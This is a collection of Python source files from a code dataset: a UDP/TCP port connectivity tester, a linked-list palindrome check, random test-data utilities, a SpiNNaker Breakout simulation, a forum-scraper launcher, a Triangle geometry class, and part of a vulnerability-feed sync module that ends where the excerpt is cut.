+{"seq_id":"557356436","text":"import socket\n\nIP = 'x.x.x.x'\nDEBUG = True\nports = [21, 22, 53, 25, 111, 443, 8443, 80, 8889, 10000, 21050, 48000, 48001, 14000]\nsocket.setdefaulttimeout(5)\n\nprint('Testing UDP')\n# UDP\nfor port in ports:\n try:\n sock = socket.socket(socket.AF_INET, # Internet\n socket.SOCK_DGRAM) # UDP\n message = 'UDP %d' % port\n sock.sendto(message.encode(), (IP, port))\n except Exception as e:\n print(e)\n\n# TCP\nprint('Testing TCP')\nfor port in ports:\n try:\n sock = socket.socket(socket.AF_INET, # Internet\n socket.SOCK_STREAM) # TCP\n sock.connect((IP, port))\n message = 'TCP %d' % port\n sock.send(message.encode())\n print('Port %d working' % port)\n except socket.timeout:\n if DEBUG:\n print('Port %d timeout' % port)\n pass\n except Exception as e:\n print(e)\n","sub_path":"misc/test_sockets_client.py","file_name":"test_sockets_client.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"348742947","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n ptr = head\n length = 0\n while ptr != None:\n ptr = ptr.next\n length += 1\n if length <= 1:\n return True\n half = length / 2\n count = 1\n newHead = head\n nptr = head.next\n head.next = None\n while count < half:\n pptr = nptr\n nptr = nptr.next\n pptr.next = newHead\n newHead = pptr\n count += 1\n if length % 2 != 0:\n nptr = nptr.next\n ptr1 = newHead\n ptr2 = nptr\n while ptr1 != None:\n if ptr1.val != ptr2.val:\n return False\n ptr1 = ptr1.next\n ptr2 = ptr2.next\n return True\n \n","sub_path":"234_Palindrome_Linked_List.py","file_name":"234_Palindrome_Linked_List.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"373177513","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/7/12\n# @Author : Zou Yutao\n# @File : dataUtils.py\n\n\"\"\"\n封装数据生成相关关键字\n\"\"\"\n\nimport uuid\nimport string\nimport random\nimport time\nimport datetime\n\n\ndef rand_uuid():\n\n \"\"\"随机产生一个32位的uuid\n - :return: 返回uuid\n \"\"\"\n temp = str(uuid.uuid1())\n return temp.replace(\"-\", \"\")\n\n\ndef rand_name(prefix=None, length=5):\n \"\"\"产生随机名字\n\n - :param prefix: 【选填】名字的前缀,可选值,类型:string\n - :param length: 【选填】名字的后缀的长度,类型:int\n - :return: 返回随机名字\n \"\"\"\n rand_str = \"\".join(random.sample(string.digits, int(length)))\n str1_temp = rand_str if not prefix else prefix + rand_str\n return str1_temp\n\n\ndef rand_str(length):\n \"\"\"随机产生指定长度的字符串\n\n - :param length: 【必填】字符串长度,类型:int\n - :return: 返回字符串\n \"\"\"\n\n char = string.ascii_letters + string.digits + string.punctuation\n rand_str1 = \"\".join(random.choice(char) for x in range(int(length)))\n return rand_str1\n\n\ndef get_time_stamp():\n \"\"\"获取时间戳\n\n - :return:返回时间戳\n \"\"\"\n temp_time = str(int(time.time()*1000))\n return temp_time\n\n\ndef get_time_stamp_formatted(formatter=\"%Y-%m-%d %H:%M:%S\"):\n \"\"\"获取g格式化后的时间戳\n\n - :return:返回格式化后的时间戳\n \"\"\"\n temp_time = time.strftime(formatter, time.localtime(time.time()))\n return temp_time\n\n\ndef time_delta(days=0, seconds=0, microseconds=0, milliseconds=0, minutes=0, hours=0, weeks=0):\n \"\"\"在当前时间基础上进行时间增减操作\n\n - :param days: 【可选】单位:天;类型:整数\n - :param seconds: 【可选】单位:秒;类型:整数\n - :param microseconds: 【可选】单位:毫秒;类型:整数\n - :param milliseconds: 【可选】单位:千毫秒;类型:整数\n - :param minutes:【可选】单位:分钟;类型:整数\n - :param hours:【可选】单位:小时;类型:整数\n - :param weeks:【可选】单位:周;类型:整数\n - :return: 返回格式化后的时间\n\n - 举例:\n | Time Delta | days=5 |\n \"\"\"\n # 获取当前时间\n now = datetime.datetime.now()\n # 当前时间加上半小时\n add_time = now + datetime.timedelta(days=days, seconds=seconds, microseconds=microseconds, milliseconds=milliseconds,\n minutes=minutes, hours=hours, weeks=weeks)\n # 格式化字符串输出\n formatted_time = add_time.strftime('%Y-%m-%d %H:%M:%S')\n return formatted_time\n\n\ndef random_chn(length):\n \"\"\"随机生成中文字符串\n\n - :param length: 【必填】指定中文字符串的长度\n - :return: 返回生成的字符串\n \"\"\"\n list1 = [\"一\", \"汽\", \"大\", \"众\", \"迈\", \"腾\", \"高\", \"尔\", \"夫\", \"探\", \"歌\", \"岳\", \"宝\", \"来\", \"速\",\"捷\",\"达\"]\n result = \"\"\n for i in range(int(length)):\n result += random.choice(list1)\n return result\n\n\ndef random_eng(length):\n \"\"\"随机生成英文字符串\n\n - :param length: 【必填】指定英文字符串的长度\n - :return: 返回生成的字符串\n \"\"\"\n result = \"\"\n for i in range(int(length)):\n s = chr(random.randint(65, 90))\n result += s\n return result\n\n\nif __name__ == \"__main__\":\n a = time_delta(days=-5)\n print (a)\n\n\n\n","sub_path":"OneAPPCommonLib/dataUtils.py","file_name":"dataUtils.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"107548309","text":"import spynnaker.pyNN as sim\nfrom spynnaker_external_devices_plugin.pyNN.connections.\\\n spynnaker_live_spikes_connection import SpynnakerLiveSpikesConnection\nimport spynnaker_external_devices_plugin.pyNN as ex\nimport spinn_breakout\nimport pylab as plt\n\nfrom vision.sim_tools.connectors.standard_connectors import breakout_one2one\n\nfrom vision.retina import Retina, dvs_modes, MERGED\n# from vision.lgn import LGN\n\nburst_params = {'a': 0.02, 'b': 0.25, 'c': -55.0, 'd': 0.05, \n 'v_init': -64., 'u_init': -0.25*64}\n\nTESTING = True\n# TESTING = False\n\n# Game resolution, coords layout in packet\nif TESTING:\n X_RESOLUTION = 40\n Y_RESOLUTION = 32\n X_BITS = 8\n Y_BITS = 8\n N_NEURON = 2\nelse:\n X_RESOLUTION = 160\n Y_RESOLUTION = 128\n X_BITS = 8\n Y_BITS = 8\n N_NEURON = 1\n\n# UDP port to read spikes from\nUDP_PORT = 19993#17893\n\n# Setup pyNN simulation\nsim.setup(timestep=1.0)\n\n#\n#\n########################################################################\n# B R E A K O U T\n########################################################################\n\n# Create breakout population and activate live output for it\nbreakout_pop = sim.Population(N_NEURON, spinn_breakout.Breakout, {}, label=\"breakout\")\nex.activate_live_output_for(breakout_pop, host=\"0.0.0.0\", port=UDP_PORT)\n\n# Create spike injector to inject keyboard input into simulation\nkey_input = sim.Population(2, ex.SpikeInjector, {\"port\": 12367}, label=\"key_input\")\nkey_input_connection = SpynnakerLiveSpikesConnection(send_labels=[\"key_input\"])\n\n# Connect key spike injector to breakout population\nsim.Projection(key_input, breakout_pop, sim.OneToOneConnector(weights=2))\n\n# Create visualiser\nvisualiser = spinn_breakout.Visualiser(\n UDP_PORT, key_input_connection,\n x_res=X_RESOLUTION, y_res=Y_RESOLUTION,\n x_bits=X_BITS, y_bits=Y_BITS)\n\n#\n#\n########################################################################\n# I N T E R M E D I A T E B U R S T I N G\n########################################################################\n\ninter_pop = sim.Population(X_RESOLUTION*Y_RESOLUTION, sim.IZK_curr_exp, \n burst_params, label='relay')\ninter_pop.record()\n \no2o_bko = sim.FromListConnector( breakout_one2one(X_RESOLUTION, Y_RESOLUTION,\n X_BITS, weights=10.) )\nbrk2intr = sim.Projection(breakout_pop, inter_pop, o2o_bko)\n\n# ex.activate_live_output_for(inter_pop, host=\"0.0.0.0\", port=UDP_PORT)\n#\n#\n########################################################################\n# R E T I N A\n########################################################################\n\n\n# retina = Retina(sim, breakout_pop, X_RESOLUTION, Y_RESOLUTION, \n # dvs_modes[MERGED])\n\n# Run simulation (non-blocking)\n# sim.run(None)\nsim.run(17000)\n\n# Show visualiser (blocking)\n# visualiser.show()\nspks = inter_pop.getSpikes(compatible_output=True)\n# print(spks)\n\n# End simulation\nsim.end()\n\nfig = plt.figure()\nax = plt.subplot(1, 1, 1)\nts = [st for (nid, st) in spks]\nni = [nid for (nid, st) in spks]\nplt.plot(ts, ni, '.')\nplt.show()\n\n","sub_path":"BreakOut/test_retina.py","file_name":"test_retina.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"643957650","text":"from incels_co_utils import build_index, get_thread\nfrom tsfresh import extract_features\nfrom utils import get_thread_global, initialize_worker, get_html_session\nfrom multiprocessing import Pool\nimport pandas as pd\nimport argparse\nimport os\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\n description=\"\"\"This script downloads the incels.is forum\"\"\")\n\n parser.add_argument(\"--dst\", dest=\"dst\", type=str, default=\"./data/forums/incels/\",\n help=\"Location to save the forum.\")\n\n parser.add_argument(\"--index\", dest=\"index\", type=str, default=\"./data/forums/incels/index.csv\",\n help=\"Location of index file.\")\n\n parser.add_argument(\"--build_index\", dest=\"build_index\", action=\"store_true\",\n help=\"If true, builds index, otherwise gets posts.\")\n\n parser.add_argument(\"--update\", dest=\"build_index\", action=\"store_true\",\n help=\"If true, rebuilds index and gets different posts.\")\n\n parser.add_argument(\"--nump\", dest=\"nump\", type=int, default=15,\n help=\"Number of simultaneous processes.\")\n\n parser.add_argument(\"--debug\", dest=\"debug\", action=\"store_true\",\n help=\"Runs w/o multiprocessing for debugging.\")\n\n args = parser.parse_args()\n\n os.makedirs(args.dst, exist_ok=True)\n\n # Build index \n if args.build_index:\n build_index(None, args.index, args.nump)\n \n # Get data posts\n else:\n to_run = list(pd.read_csv(args.index)[\"link\"].values)\n to_run = list(zip([get_thread]*len(to_run), to_run))\n if args.debug:\n get_html_session = get_html_session()\n for f, thread in to_run:\n f(thread, get_html_session)\n else:\n p = Pool(args.nump, initializer=initialize_worker)\n p.starmap(get_thread_global, to_run)\n","sub_path":"forums_tools/incels_co_loader.py","file_name":"incels_co_loader.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"219203938","text":"import sys\nfrom offline_scheduler.source.strategy import Strategy\nfrom offline_scheduler.source.nodes import SharedInfo\n\n\nclass CostStrategy(Strategy):\n\n def __init__(self, runDate):\n self.normalize(runDate)\n\n def normalize(self, runDate):\n unitPrice = [node.unitPrice for node in SharedInfo.bigNodes]\n ma = max(unitPrice)\n mi = min(unitPrice)\n for node in SharedInfo.bigNodes:\n node.unitPrice = (ma - node.unitPrice) / (ma - mi)\n\n def normalizedScore(self, fromNode, endNode, hour):\n for node in SharedInfo.bigNodes:\n if node.name == endNode:\n return node.unitPrice\n return 0\n\nif __name__ == '__main__':\n a = CostStrategy(sys.argv[1])\n a.normalizedScore(sys.argv[1])\n","sub_path":"offline_scheduler/source/costStrategy.py","file_name":"costStrategy.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"533872468","text":"''' a pythonic Triangle\n'''\n\nimport math\nfrom .point import Point\nfrom .line import Segment\nfrom .exceptions import *\n\nclass Triangle(object):\n '''a pythonic Triangle\n\n Implements a Triangle object in the XY plane having three\n non-coincident vertices and three intersecting edges.\n\n Vertices are labeled 'A', 'B' and 'C'.\n Edges are labeled 'AB', 'BC' and 'AC'.\n\n The length of each edge is labeled 'ab', 'bc' and 'ac'.\n\n Angles in radians are labeled:\n 'alpha' for CAB\n 'beta' for ABC\n 'gamma' for BCA\n\n Usage:\n\n >>> a = Triangle()\n >>> b = Triangle(A,B,C)\n >>> c = Triangle([p,q,r])\n >>> d = Triangle([x,y,z],[x,y,z],[x,y,z])\n >>> e = Triangle(A=p0,B=p1,C=p2)\n '''\n \n vertexNames = 'ABC'\n vertexNameA = vertexNames[0]\n vertexNameB = vertexNames[1]\n vertexNameC = vertexNames[2]\n edgeNames = [vertexNameA+vertexNameB,\n vertexNameB+vertexNameC,\n vertexNameA+vertexNameC]\n edgeNameAB = edgeNames[0]\n edgeNameBC = edgeNames[1]\n edgeNameAC = edgeNames[2]\n \n @classmethod\n def randomXY(cls,origin=None,radius=1):\n '''\n :param: radius - float\n :param: origin - optional Point subclass\n :return: Triangle\n\n Creates a triangle with random coordinates in the circle\n described by (origin,radius). If origin is unspecified, (0,0)\n is assumed.\n '''\n \n pts = set()\n while len(pts) < 3:\n p = Point.randomXY(origin,radius)\n pts.add(p)\n \n return cls(pts)\n\n @classmethod\n def unit(cls):\n '''\n XXX missing doc string\n '''\n return cls(Point.units())\n \n def __init__(self,*args,**kwds):\n \n if len(args) == 0 and len(kwds) == 0:\n return\n\n if len(args) == 1:\n self.ABC = args[0]\n else:\n self.ABC = args\n\n for name in self.vertexNames:\n try:\n setattr(self,name,kwds[name])\n except:\n pass\n \n @property\n def A(self):\n '''\n Vertex of triangle, Point subclass.\n '''\n try:\n return self._A\n except AttributeError:\n pass\n self._A = Point()\n return self._A\n\n @A.setter\n def A(self,newValue):\n self.A.xyz = newValue\n\n @property\n def B(self):\n '''\n Vertex of triangle, Point subclass.\n '''\n try:\n return self._B\n except AttributeError:\n pass\n self._B = Point(1,0)\n return self._B\n \n @B.setter\n def B(self,newValue):\n self.B.xyz = newValue\n \n @property\n def C(self):\n '''\n Vertex of triangle, Point subclass.\n '''\n try:\n return self._C\n except AttributeError:\n pass\n self._C = Point(0,1)\n return self._C\n\n @C.setter\n def C(self,newValue):\n self.C.xyz = newValue\n \n @property\n def ABC(self):\n '''\n A list of the triangle's vertices, list.\n '''\n return [self.A,self.B,self.C]\n \n @ABC.setter\n def ABC(self,iterable):\n self.A,self.B,self.C = iterable\n \n @property\n def AB(self):\n '''\n Line segment with endpoints A and B, Segment subclass.\n '''\n return Segment(self.A,self.B)\n\n @property\n def AC(self):\n '''\n Line segment with endpoints A and C, Segment subclass.\n '''\n return Segment(self.A,self.C)\n\n @property\n def BC(self):\n '''\n Line segment with endpoints B and C, Segment subclass.\n '''\n return Segment(self.B,self.C)\n\n @property\n def vertices(self):\n '''\n Alias for property \"ABC\", list.\n '''\n return self.ABC\n \n @property\n def sides(self):\n '''\n List of line segments, list.\n\n '''\n return [self.AB,self.BC,self.AC]\n\n @property\n def hypotenuse(self):\n '''\n The longest side of the triangle.\n\n '''\n s = self.sides\n s.sort(key=lambda x:x.length)\n return s[-1]\n\n @property\n def alphaRadians(self):\n '''\n The angle described by CAB in radians, float.\n\n '''\n return self.AB.radiansBetween(self.AC)\n\n @property\n def alphaDegrees(self):\n return math.degrees(self.alphaRadians)\n\n @property\n def betaRadians(self):\n '''\n The angle described by ABC in radians, float.\n\n '''\n BA = Segment(self.B,self.A)\n return BA.radiansBetween(self.BC)\n\n @property\n def betaDegrees(self):\n return math.degrees(self.betaRadians)\n\n @property\n def gammaRadians(self):\n '''\n The angle described by BCA in radians, float.\n\n '''\n CB = Segment(self.C,self.B)\n return CB.radiansBetween(Segment(self.C,self.A))\n\n @property\n def gammaDegrees(self):\n '''\n '''\n return math.degrees(self.gammaRadians)\n\n @property\n def anglesRadians(self):\n '''\n '''\n return [self.alphaRadians, self.betaRadians, self.gammaRadians]\n\n @property\n def anglesDegrees(self):\n return [self.alphaDegrees, self.betaDegrees, self.gammaDegrees]\n\n @property\n def ab(self):\n '''\n The length of line segment AB, float.\n\n '''\n return self.A.distance(self.B)\n\n @property\n def bc(self):\n '''\n The length of line segment BC, float.\n\n '''\n return self.B.distance(self.C)\n \n @property\n def ac(self):\n '''\n The length of line segment AC, float.\n\n '''\n return self.A.distance(self.C)\n\n @property\n def isCCW(self):\n '''\n Returns True if ABC has a counter-clockwise rotation, boolean.\n\n '''\n return self.A.isCCW(self.B,self.C)\n\n @property\n def ccw(self):\n '''\n Result of ccw(A,B,C), float.\n\n '''\n return self.A.ccw(self.B,self.C)\n \n @property\n def area(self):\n '''\n Area of the triangle, float.\n\n '''\n return abs(self.ccw) / 2\n\n @property\n def semiperimeter(self):\n '''\n semiperimeter = (|AB|+|AC|+|BC|) / 2\n\n '''\n return sum([x.length for x in self.sides])/2.\n\n @property\n def isEquilateral(self):\n '''\n Returns true if all sides are the same length.\n '''\n\n ab,bc,ac = self.ab,self.bc,self.ac\n \n return (ab == bc) and (bc == ac)\n\n @property\n def isIsosceles(self):\n '''\n Returns true if two sides are the same length.\n '''\n ab,bc,ac = self.ab,self.bc,self.ac\n \n if ab == bc:\n return True\n\n if ab == ac:\n return True\n\n return bc == ac\n \n\n @property\n def isScalene(self):\n '''\n Returns true if all sides are unequal in length.\n '''\n\n ab,bc,ac = self.ab,self.bc,self.ac\n\n return (ab!=bc) and (ab!=ac) and (bc!=ac)\n\n @property\n def isRight(self):\n '''\n Returns true if one angle in the triangle is a 90 degree (Pi/2\n rad) angle.\n '''\n half_pi = math.pi / 2\n for a in self.anglesRadians:\n if a == half_pi: # epsilon check?\n return True\n return False\n\n\n @property\n def isObtuse(self):\n '''\n Returns true if one angle in the triangle is greater than 90\n degrees (Pi/2 radians).\n\n '''\n half_pi = math.pi / 2\n\n for a in self.anglesRadians:\n if a > half_pi: # epsilon check?\n return True\n return False\n\n @property\n def isAcute(self):\n '''\n Returns true if all angles are less than 90 degrees ( Pi/2 radians).\n '''\n\n half_pi = math.pi / 2\n for a in self.anglesRadians:\n if a >= half_pi: # epsilon check?\n return False\n return True\n\n\n @property\n def mapping(self):\n '''\n Mapping of vertex names to vertices, dict.\n '''\n return { self.vertexNameA:self.A,\n self.vertexNameB:self.B,\n self.vertexNameC:self.C }\n\n def __str__(self):\n return 'A={A}, B={B}, C={C}'.format(**self.mapping)\n\n def __repr__(self):\n return '{klass}({args})'.format(klass=self.__class__.__name__,\n args=str(self))\n\n def __eq__(self,other):\n '''\n x == y\n \n Iff len(set(x.vertices).difference(set(y.vertices))) == 0\n\n '''\n a = set(self.vertices)\n b = set(other.vertices)\n return len(a.difference(b)) == 0\n\n def __contains__(self,point):\n '''\n :param: point - Point subclass\n :return: boolean\n\n Returns True if point is inside the triangle or\n lies on any of it's sides.\n '''\n try:\n r = [self.A.ccw(self.B,point),\n self.B.ccw(self.C,point),\n self.C.ccw(self.A,point)]\n except CollinearPoints:\n # point is on the lines AB, BC, or CA and that counts.\n return True\n \n return not (any([x>0 for x in r]) and any([x<0 for x in r]))\n\n def altitude(self,side='AB'):\n '''\n :param: side - optional string\n :return: float\n\n The shortest distance from the specified side to the opposite point.\n\n '''\n s = self.semiperimeter\n\n num = 2 * math.sqrt(s*(s-self.ab)*(s-self.bc)*(s-self.ac))\n\n try:\n div = {'AB':self.ab,'AC':self.ac,'BC':self.bc}[side]\n return num / div\n except IndexError:\n pass\n\n msg = \"expecting 'AB', 'BC' or 'AC', got '{side}'\"\n \n raise ValueError(msg.format(side=side))\n \n \n def flip(self,side='AB'):\n '''\n :param: side - optional string\n :return: None\n\n The optional side paramater should have one of three values:\n AB, BC, or AC. \n\n Changes the order of the triangle's points, swapping the\n specified points. Doing so will change the results of isCCW\n and ccw.\n\n '''\n \n if side == 'AB':\n tmp = Point(self.A)\n self.A = self.B\n self.B = tmp\n return\n \n if side == 'BC':\n tmp = Point(self.B)\n self.B = self.C\n self.C = tmp\n return\n \n if side == 'AC':\n tmp = Point(self.A)\n self.A = self.C\n self.C = tmp\n return\n \n msg = \"expecting 'AB', 'BC' or 'AC', got '{side}'\"\n \n raise ValueError(msg.format(side=side))\n \n\n def doesIntersect(self,other):\n '''\n :param: other - Triangle subclass\n :return: boolean\n\n Returns True iff:\n Any side in self intersects any side in other.\n \n '''\n\n otherType= type(other)\n if issubclass(otherType,Triangle):\n for s in self.sides:\n for q in other.sides:\n if s.doesIntersect(q):\n return True\n return False\n\n if issubclass(otherType,Line):\n for s in self.sides:\n if s.doesIntersect(other):\n return True\n return False\n\n msg = \"expecting Line or Triangle subclasses, got '{type}'\"\n \n raise TypeError(msg.format(type=otherType))\n \n \n","sub_path":"venv/lib/python3.9/site-packages/Geometry/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":11655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"480184253","text":"\"\"\"\nFeeds manager system. Handles syncing and storing feed data locally for use by the policy engine.\n\nOverall approach is to handle each feed individually with specific mapping code for the data types of each feed.\nThe reason for this is a more efficient (for query) data schema to support quick policy evaluations that require feed\ndata. Additionally, any new feed will require new code to be able to consume it in the policy eval system anyway, so\nan update to the feed handling code is ok to be required as well.\n\n\"\"\"\nimport json\nimport datetime\nimport re\nimport threading\nimport time\nimport traceback\n\nfrom anchore_engine.db import get_thread_scoped_session as get_session\nfrom anchore_engine.db import GenericFeedDataRecord, FeedMetadata, FeedGroupMetadata\nfrom anchore_engine.db import FixedArtifact, Vulnerability, GemMetadata, NpmMetadata, NvdMetadata, CpeVulnerability\nfrom anchore_engine.services.policy_engine.engine.logs import get_logger\nfrom anchore_engine.clients.feeds.feed_service import get_client as get_feeds_client, InsufficientAccessTierError, InvalidCredentialsError\nfrom anchore_engine.util.langpack import convert_langversionlist_to_semver\n\nlog = get_logger()\n\nfeed_list_cache = threading.local()\n\n\ndef build_group_sync_result():\n return {'group': None, 'status': None, 'total_time_seconds': 0, 'updated_record_count': 0, 'updated_image_count': 0}\n\n\ndef build_feed_sync_results():\n return {'feed': None, 'status': None, 'total_time_seconds': 0, 'groups': []}\n\n\ndef get_feeds_config(full_config):\n \"\"\"\n Returns the feeds-specifc portion of the global config. To centralized this logic.\n :param full_config:\n :return: dict that is the feeds configuration\n \"\"\"\n return full_config.get('feeds',{})\n\n\ndef get_selected_feeds_to_sync(config):\n \"\"\"\n Given a configuration dict, determine which feeds should be synced.\n\n :param config:\n :return: list of strings of feed names to sync, an empty least means no feeds. Response of None means selective sync is disabled and sync all feeds.\n \"\"\"\n\n feed_config = get_feeds_config(config)\n if not feed_config:\n return []\n\n if feed_config.get('selective_sync', {}).get('enabled', False):\n return [x[0] for x in [x for x in list(feed_config.get('selective_sync', {}).get('feeds', {}).items()) if x[1]]]\n else:\n return None\n\n\nclass SingleTypeMapperFactory(object):\n def __init__(self, feed_name, mapper_clazz, common_key=None):\n \"\"\"\n Create a single-type mapper factory that returns mappers of type \n\n :param feed_name: name of the feed to configure into the mapper\n :param mapper_clazz: the class to instantiate when requested\n :param common_key: the data key to look for in items if all groups use the same key name for data items \n \"\"\"\n\n self.feed = feed_name\n self.mapper_clazz = mapper_clazz\n self.common_key = common_key\n\n def __getitem__(self, item):\n return self.mapper_clazz(self.feed, item, self.common_key)\n\n def get(self, item):\n return self.__getitem__(item)\n\n\nclass FeedDataMapper(object):\n \"\"\"\n Base interface for mapping feed records into the db\n \"\"\"\n\n def __init__(self, feed_name, group_name, keyname):\n self.feed = feed_name\n self.group = group_name\n self.key_item_name = keyname\n\n def map(self, record_json):\n \"\"\"\n Map a single data feed record from msg to db format\n :param record_json: data record deserialized from json (dict) to map\n :return: a DB entity that can be added to a session/persisted\n \"\"\"\n raise NotImplementedError()\n\n\nclass KeyIDFeedDataMapper(FeedDataMapper):\n \"\"\"\n A mapper for handling the case where each data item is a single key that is the id itself, without a field identifier.\n\n E.g. { 'my_id1': { 'data1': 'value1'} } -> key='my_id1', data={'data1':'value1'}\n\n \"\"\"\n\n def map(self, record_json):\n if len(list(record_json.keys())) == 1:\n key, value = list(record_json.items())[0]\n return self.map_inner(key, value)\n\n def map_inner(self, key, data):\n raise NotImplementedError()\n\n\nclass GenericFeedDataMapper(KeyIDFeedDataMapper):\n \"\"\"\n A generic mapping class to consume feed json and return db objects \n \"\"\"\n\n def map_inner(self, key, data):\n \"\"\"\n Map a single data feed record from msg to db format\n :param record_json: data record deserialized from json (dict) to map\n :return: a DB entity that can be added to a session/persisted\n \"\"\"\n\n db_rec = GenericFeedDataRecord()\n db_rec.feed = self.feed\n db_rec.group = self.group\n db_rec.id = key\n db_rec.data = data\n return db_rec\n\n\nclass GemPackageDataMapper(KeyIDFeedDataMapper):\n \"\"\"\n Maps a Gem package feed record to a db record\n \"\"\"\n\n def map_inner(self, key, data):\n db_rec = GemMetadata()\n db_rec.name = key[:255]\n db_rec.id = int(data.get('id')) if data.get('id') else -1\n db_rec.authors_json = data.get('authors')\n db_rec.versions_json = data.get('versions')\n db_rec.licenses_json = data.get('licenses')\n db_rec.latest = data.get('latest')[:255] if data.get('latest') else None\n return db_rec\n\n\nclass NpmPackageDataMapper(KeyIDFeedDataMapper):\n \"\"\"\n Maps a NPM package record to the db record\n \"\"\"\n\n def map_inner(self, key, data):\n db_rec = NpmMetadata()\n db_rec.name = key[:255]\n db_rec.versions_json = data.get('versions')\n db_rec.latest = data.get('latest')[:255] if data.get('latest') else None\n db_rec.sourcepkg = data.get('sourcepkg')[:255] if data.get('sourcepkg') else None\n db_rec.origins_json = data.get('origins')\n db_rec.lics_json = data.get('lics')\n return db_rec\n\n\nclass NvdFeedDataMapper(FeedDataMapper):\n \"\"\"\n Maps an NVD record into an NvdMetadata ORM object\n \"\"\"\n def map(self, record_json):\n db_rec = NvdMetadata()\n db_rec.name = record_json['@id']\n db_rec.namespace_name = self.group\n db_rec.summary = record_json.get('summary', \"\")\n\n rawvc = record_json.get('vulnerable-configuration', {})\n db_rec.vulnerable_configuration = rawvc\n #db_rec.vulnerable_configuration = json.dumps(rawvc)\n\n rawvsw = record_json.get('vulnerable-software-list', {})\n db_rec.vulnerable_software = rawvsw\n #db_rec.vulnerable_software = json.dumps(rawvsw)\n\n rawcvss = record_json.get('cvss', {})\n db_rec.cvss = rawcvss\n #db_rec.cvss = json.dumps(rawcvss)\n\n sev = \"Unknown\"\n try:\n #cvss_json = json.loads(self.cvss)\n score = float(rawcvss['base_metrics']['score'])\n if score <= 3.9:\n sev = \"Low\"\n elif score <= 6.9:\n sev = \"Medium\"\n elif score <= 10.0:\n sev = \"High\"\n else:\n sev = \"Unknown\"\n except:\n sev = \"Unknown\"\n db_rec.severity = sev\n\n db_rec.vulnerable_cpes = []\n\n vswlist = []\n try:\n if isinstance(rawvsw['product'], list):\n vswlist = rawvsw['product']\n else:\n vswlist = [rawvsw['product']]\n except:\n pass\n\n # convert each vulnerable software list CPE into a DB record\n all_cpes = {}\n for vsw in vswlist:\n try:\n\n # tokenize the input CPE\n toks = vsw.split(\":\")\n final_cpe = ['cpe', '-', '-', '-', '-', '-', '-']\n for i in range(1, len(final_cpe)):\n try:\n if toks[i]:\n final_cpe[i] = toks[i]\n else:\n final_cpe[i] = '-'\n except:\n final_cpe[i] = '-'\n\n if ':'.join(final_cpe) not in all_cpes:\n all_cpes[':'.join(final_cpe)] = True\n if final_cpe[1] == '/a':\n newcpe = CpeVulnerability()\n newcpe.feed_name = 'nvd'\n newcpe.cpetype = final_cpe[1]\n newcpe.vendor = final_cpe[2]\n newcpe.name = final_cpe[3]\n newcpe.version = final_cpe[4]\n newcpe.update = final_cpe[5]\n themeta = final_cpe[6]\n if 'ruby' in final_cpe[6]:\n themeta = '~~~ruby~~'\n elif 'node.js' in final_cpe[6] or 'nodejs' in final_cpe[6]:\n themeta = '~~~node.js~~'\n elif 'python' in final_cpe[6]:\n themeta = '~~~python~~'\n newcpe.meta = themeta\n newcpe.link = \"https://nvd.nist.gov/vuln/detail/{}\".format(db_rec.name)\n db_rec.vulnerable_cpes.append(newcpe)\n\n except Exception as err:\n log.warn(\"failed to convert vulnerable-software-list into database CPE record - exception: \" + str(err))\n\n return db_rec\n\nclass SnykFeedDataMapper(FeedDataMapper):\n \"\"\"\n Maps a Snyk record into an Vulnerability ORM object\n \"\"\"\n def map(self, record_json):\n if not record_json:\n return None\n\n # get the fundamental categories/ids\n id = list(record_json.keys()).pop()\n pkgvuln = record_json[id]\n (group_name, nslang) = self.group.split(\":\", 2)\n\n # create a new vulnerability record\n db_rec = Vulnerability()\n\n # primary keys\n db_rec.namespace_name = self.group\n db_rec.id = id\n\n # severity calculation\n db_rec.cvss2_score = pkgvuln.get('cvssScore')\n db_rec.cvss2_vectors = pkgvuln.get('cvssV3')\n db_rec.severity = db_rec.get_cvss_severity()\n\n # other metadata\n db_rec.link = pkgvuln.get('url')\n db_rec.description = \"\"\n db_rec.additional_metadata = pkgvuln\n\n # add fixed_in records\n semver_range = convert_langversionlist_to_semver(pkgvuln.get('vulnerableVersions', []), nslang)\n sem_versions = semver_range.split(' || ')\n for sem_version in sem_versions:\n v_in = FixedArtifact()\n v_in.name = pkgvuln.get(\"package\")\n v_in.version = sem_version\n v_in.version_format = \"semver\" #\"semver:{}\".format(nslang)\n v_in.epochless_version = v_in.version\n v_in.vulnerability_id = db_rec.id\n v_in.namespace_name = db_rec.namespace_name\n v_in.fix_metadata = {'fix_exists': pkgvuln.get('upgradeable', False)}\n db_rec.fixed_in.append(v_in)\n\n return db_rec\n\n\nclass VulnerabilityFeedDataMapper(FeedDataMapper):\n \"\"\" \n Maps a Vulnerability record:\n\n Example:\n {\n 'Vulnerability': {\n 'Description': 'Async Http Client (aka AHC or async-http-client) before 1.9.0 skips X.509 certificate verification unless both a keyStore location and a trustStore location are explicitly set, which allows man-in-the-middle attackers to spoof HTTPS servers by presenting an arbitrary certificate during use of a typical AHC configuration, as demonstrated by a configuration that does not send client certificates.',\n 'FixedIn': [\n {\n 'Name': 'async-http-client',\n 'NamespaceName': 'debian:9',\n 'Version': '1.6.5-3',\n 'VersionFormat': 'dpkg',\n 'VendorAdvisory': {\n 'NoAdvisory': False,\n 'AdvisorySummary': [\n {\n 'ID': 'DSA-0000-0',\n 'Link': 